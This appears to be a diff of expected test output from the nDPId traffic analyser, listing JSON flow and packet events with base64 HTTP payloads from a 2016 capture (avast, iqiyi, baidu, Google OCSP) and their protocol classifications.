-00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1467353150272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353150272,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5A3BAADMGNsbKbA7swKhzCABQxTUn\/rQSUIG5k1AYACEwggAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAADZC01AAIAGRNfAqHMITeooYMU2AFCms6ewkbp6GVAYAQQ6hQAAUE9TVCAvYmMyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtZW5jDQpVc2VyLUFnZW50OiB7RDY5OTA1NEQtMTY5OS00N0QyLTlCMkItRTk2RjQzOEMxMTYwfQ0KQ29udGVudC1MZW5ndGg6IDU2NzANCkhvc3Q6IGJjdS5mZi5hdmFzdC5jb20NCg0K"} 
-00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"},"http": {"hostname":"bcu.ff.avast.com","url":"bcu.ff.avast.com\/bc2","code":0,"content_type":"","user_agent":"{D699054D-1699-47D2-9B2B-E96F438C1160}"}} -02163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC05AAIAGQJvAqHMITeooYMU2AFCms6hhkbp6GVAQAQSchQAAfQmTpyjixsOwP21FM2w\/ULoWwCiRrGBztIvpkusTbkEbT7JRm749XrUdCj1kKEvBT\/wTVkKLufbjw1lE2fa\/UtfZqs8TT1sk5wEGF4kYfIBf8IaB+OB99fNQgj9Vf1WdVn6TWCfKWR8\/tOS1RKXEgVzfK9erxE3KK+nwydrin0EcycTdDVWiVtuMe6+NSVWZ\/hX990m9djhmhk3Y\/4CbzK44FcPuMMFEvf5FVV6Oh2IVmfsf\/HyiZyDsblCwMFxZeIENUdwKFZahHZX4t2m+0Z8nqx5GXJvlYlyBEV3d0wnwacDVs7VGlTeQSPCThjPgIK8C3+Vm\/SkQMbSbjQQCR56leCZ3zx0zWA16oy\/HwboJXydgKpLLIsIb296bgz9PD0n73r5JevLp9zMQqDnUQH7bGAIZpCoRWg6yOqztL9wx8O8w7fULoBoHntXDNfSIf8aFHnKtztY0xF\/96mqnymFN1wqAbHV11hLYYhYABZBRKOYh4GvMJKN2EaePTJX1g69akJ5Coj\/WAxsj0dEvDR\/vazeiKPax6X0XCpj5u6F0enF2pgEO1DTDpJi4uqvsm4AG7RZTr9WzwZ511f
H70pdVZhvHAHeLJEQhK3oT2d6qVMypkVqz3M6P1FXtaWt6+1gJ1EA+POfXctGwSFaJ2WZGwODsWtngLfTDrHYAa++DuvVvAXrC2fFJrQkArXUNzp3jB4yvJRX9IfGTljC134RtjqrqbfWIsHFlGJEvMl6y8wFPjh0U9nAnPPQHSvBi4P8rwzQhP8lZJWbdcGMeiQgoqjzlwL1JkK4Z+B\/r9S3cXUR8rrHDij9ETvqsfuOaaaj2os8zFQDB8g7oYE5htEg8jLGOrgDB+UxAsTk63FA\/Jq1qLQHIt5T87bux2F3Z6\/NtrKJ6XYTsiyX+gxtG9H+42iLcG1kZ\/aUAi1jpTBvtNKfvz8CwqOqNqLU20IAIOBemooRjwRmnBDY3f6aUMeS+wFWlvE\/51CwA1+ifJ60PDvUC79ewXAaFTKMKjf0aaHbyL5CorfEgQAN7IeqBZ06UIaZ6vzz7AgQaAmx6+Ba5qOjoaqoz\/AZLRtOM5g9J99\/JqcSZWau6dqbzwSi9lHTkFpydYtcaUiasMFbnGv1qCDetlZciKtaHoyXbLcLDtNVUeS+HOrUzQyYK2h4whXgFAMDp8Qgu77GMRNBVQqzQrQHNXcQsTRb6ToCJRD0mhPHF56bxN+TcgS8+LJg2hXeTQJGeN4XVvZl+\/NwXCMoOTGaegW++r9Spf9MH6Q7pxuozLc8xjGZ4BotpQroHGQdbg1euShz6cj4v+w35bhHqsX2WqI17RldQkIoRivoqIWQBzpBtvyVToKzr4w1pfcU7KlWiZF6wXXPmeAndVoYy0RAdjUny0dy7q\/aodxD7\/IpKex\/VPNqhV606AtQnAV2BIj+BMksKx18fv+MTvBJVqBMbMlNv\/dfX4KuK9dxD\/j5nlJb1fFCWJ+mUJw+9FKSt1DG2gs0a3nU5wTbq1xdLsklg3Akuz9T9GOR2bt29bGI8qPpXY4FyhIeC9WH4\/TgMEDv9wfb4n6lndgz9I\/9vnUXWZxcDVa2twnV4LY8xc0KQum7e2YlcthsPm+N4Sl\/nQbs4298fPcsHdqZxtg1t+yz4aZA3Jpe+9\/ltbgGRFyN2OyRh7w7lbrWs"} 
-02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1467353152282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353152282,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC5NAAIAGQFbAqHMITeooYMU2AFCms61Nkbp6GVAQAQTfHQAAbLkOCKU4wj\/evx8imwONGRNDCRNcxEbrXP8hhP5gS61xcdF\/9QCewJiAs88\/dsvrtuhb3rfKKfW889MM5i42wXGEV9fB6Oxnr9wNq+2BhBuurBIHxqXRfAAEoidfx5NjtSMkojiYfAgpgjXDepNqnYPmOEFYHjyOyZguAfDLSM7WCkcWflClhfDaN8J2wfLC\/MPix0DO7IQYMANuOzdnO3SsyyWTTBGHWAEilJLD4tHtNv5RXPXVzcDFv\/ZarQ8dpVXt06BE7M0zlIZna\/IAgdCvI6q5WBZEc\/DK1bc+szeRLHeTn9hb3LwIm5n4j6dH8WghVh4s\/faOqc4OH+pUVO\/YE9fpSsBUVYngldbrHRI5VyRGxL9aOSsPtS4AFeevGJhVzhN4cUWAnUrThdi80PfSu8tNoh7a5szE8bOfyFSl1J5U7dmSuzwsTd1O2VTTA6KkfW80J9853vrsBHj4FYhAgrfCc+AwKx842BJ5tAqCj0sllv5X87h05vAIn5jnPfuPTQZHDGSZF2ChAwxTMJDdvR6z9YqImCWEyGrlX5kVoRgmxMOXn9xgYST7BNbiKdlZJF63+s1OXqQANdKPZK9Tj+vw5aEt8npdIxi659XlE7GbPxGSGQAHioYprIcBMeXfKSeoFXi6v3GiDBYEY44c+YWn+u5dOrxPQy5gu98V\/bpgMgXufFfUvDeO83MuZBryxxpxRtKyO19btTWCUF4PY4vFOsUlEu5wupC5QJDHjSI5JBPnNgSjAFFlHl+H48KJmALxOWkXAjw7wfJ7i0t\/VAJjqzl7KEymLhTMovEkDd8M5KH4L7bM1Pk5SNL44CnPTt0uJC5bu5Y0nC5WeJ5o8FAU+zDySeyFlAKIjVubfBhsfH6iYELuT6bM366CZ2JChIMXy77eZ2ogebEDmfXuAZrshdW456rcGFtnXh7J5hHvVDP3AMs6IVf8LUWSqi6N9+RmH\/KbTYzdQuJb03F7\/k5dx4g2yWo3fs+Lr5JRUf5t\/vLHgHitgjVHiyfZxFryJ2gxO3j2J3Cy8+3iOyUtI4v3PFchrsaNap7PQFpuFhS4kHaW1nfHocLobHPOFLIJLaEq2Z3VJqsMiOWSIoeotU+nrZScO9ejGxvSfkni9AXlOWPv1zuo9rLJelhCyIJrC4Xn+WkzpkY6zFTV6\/5UunGX0Tb8Vczy7McXvGLjkrbiGj3QMStuCAUNlJpEVT8k65UrM5LwbEH4KAV5kUEs1eVMQu3tNilgdCCEWCCXyXIXhc7F8aNPdAP\/PS1DvzRFz2xUmcIICmQZ5HsVmrPOAorHnvum6saL0SZ4Xpsb2NtRcCkYo5ulH5R5LBdjwVak1WRQmaIpJTSuFDlTHmcUlO91XLgWqht8m4JPcT8KVxMhaep7\/D8rK0OPB4\/bZz3AmwRRkEn1w2WxcrplYcrA9llu+UUdElcjgIQb+8Ut3dZ78QhR6hg0LSfopHZZKMjm7H8PGYnnckV7+UPzMYjSuw2xH6Scc5NP4qyN1pRNyJqbAsYjU
9DQoRSV4QpLKW1o4cygA24ZnSsb0t8q6Ugh54j1Rk4AcTFxkKhm0GqVFfy3vqOZrj5LFm1yDiouv3X+Ev+I8njUSG1\/7yVhpxE8Ojwp45UwRLFQxvD31ZdmkgP4Weywok7EK11JBAomj+s4\/jGCJXIASa\/M"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1467353138757,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAAUUA1lAAIAGkOvAqHMIZePIC8UfAFBKp6EFWDmKmFAQ\/\/B9QgAAR0VUIC90cmFjazI\/YT0xJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxMzgmYz1hZTg3Y2IzY2ZkZjQ5NGFhNDhkYzYwODkwOWY2OTI1MCZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTg4NzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTI3NTU4JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPWFlYTU2YTgwOGZjOTJlZjM2MDUxOTEyMTk0OGUwZjI3JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU5MTI0JnZlPTEmdz0yLDMgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHh
jMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFRSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"} +01395{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=1&as=1;2,3;4,5&b=1467353138&c=ae87cb3cfdf494aa48dc608909f69250&cv=5.2.15.2240&d=5000000858874&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000927558&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=aea56a808fc92ef360519121948e0f27&sv=4.10.004&u=1&up=&v=5000000859124&ve=1&w=2,3","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1467353138757,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAADjA1pAAIAGlRvAqHMIZePIC8UfAFBKp6XxWDmKmFAY\/\/B4OwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} 
+00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":996,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1467353138794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353138794,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkTcBAAC8Gm3Rl48gLwKhzCABQxR9YOYqYSqemrFAYSdTGUAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7560000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1467353138931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":707,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":707,"pkt_l4_len":673,"thread_ts_msec":1467353138931,"pkt":"TF4M6gNlABxCjnAxCABFAAK1A3VAAIAG1W7AqHMIe31wMcUgAFAUdsqc+xrYh1AYQTe7PAAAR0VUIC9jbGs\/NTNlMjVlMzNlMDY0YzY1N2MwNmI1NThlNWMzYzMzZmQgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7560000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/clk?53e25e33e064c657c06b558e5c3c33fd","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01370{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1467353139050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":744,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":744,"pkt_l4_len":710,"thread_ts_msec":1467353139050,"pkt":"ABxCjnAxTF4M6gNlCABFAALaH2hAAC0GDFd7fXAxwKhzCABQxSD7GtiHFHbNKVAYADhuxwAASFRUUC8xLjEgMzAyIEZvdW5kDQpMb2NhdGlvbjogaHR0cHM6Ly95b3V0dS5iZS85b3ZjSndDN0FFYw0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLSUQ9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IFBhdGg9LzsgRG9tYWluPWhtLmJhaWR1LmNvbTsgRXhwaXJlcz1GcmksIDAxIEp1bCAyMDE2IDA2OjM1OjM4IEdNVA0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLTE9HPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4NjUzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBQYXRoPS87IERvbWFpbj1obS5iYWlkdS5jb207IEV4cGlyZXM9RnJpLCAwMSBKdWwgMjAxNiAwNjozNTozOCBHTVQNClAzUDogQ1A9IkNVUmEgQURNYSBERVZhIFBTQW8gUFNEbyBPVVIgQlVTIFVOSSBQVVIgSU5UIERFTSBTVEEgUFJFIENPTSBOQVYgT1RDIE5PSSBEU1AgQ09SIg0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KU2VydmVyOiBhcGFjaGUNCg0K"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1467353139305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1467353139305,"pkt":"TF4M6gNlABxCjnAxCABFAAEKA4dAAIAGQVvAqHMIy0K2GMUiAFDWCs3i1IWCxVAYAQQdEwAAR0VUIC9vY3NwL01Fa3dSekJGTUVNd1FUQUpCZ1VyRGdNQ0dnVUFCQlR5NEdyNWhZb2RqWENiU1JramVxbTFHaWglMkJaQVFVU3QwR0ZodTg5bWkxZHZXQnRydGlHcnBhZ1M4Q0NFWXJGWGtxMnVneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IE1pY3Jvc29mdC1DcnlwdG9BUEkvNi4xDQpIb3N0OiBjbGllbnRzMS5nb29nbGUuY29tDQoNCg=="} +00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients1.google.com","url":"clients1.google.com\/ocsp\/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEYrFXkq2ugz","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} +01465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1467353139309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":813,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":813,"pkt_l4_len":779,"thread_ts_msec":1467353139309,"pkt":"ABxCjnAxTF4M6gNlCABFAAMfaWMAAD0GXGrLQrYYwKhzCABQxSLUhYLF1grOxFAYAO2vKAAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jc3AtcmVzcG9uc2UNCkRhdGU6IFR1ZSwgMjggSnVuIDIwMTYgMTc6MzQ6NDkgR01UDQpFeHBpcmVzOiBTYXQsIDAyIEp1bCAyMDE2IDE3OjM0OjQ5IEdNVA0KU2VydmVyOiBvY3NwX3Jlc3BvbmRlcg0KQ29udGVudC1MZW5ndGg6IDQ2Mw0KWC1YU1MtUHJvdGVjdGlvbjogMTsgbW9kZT1ibG9jaw0KW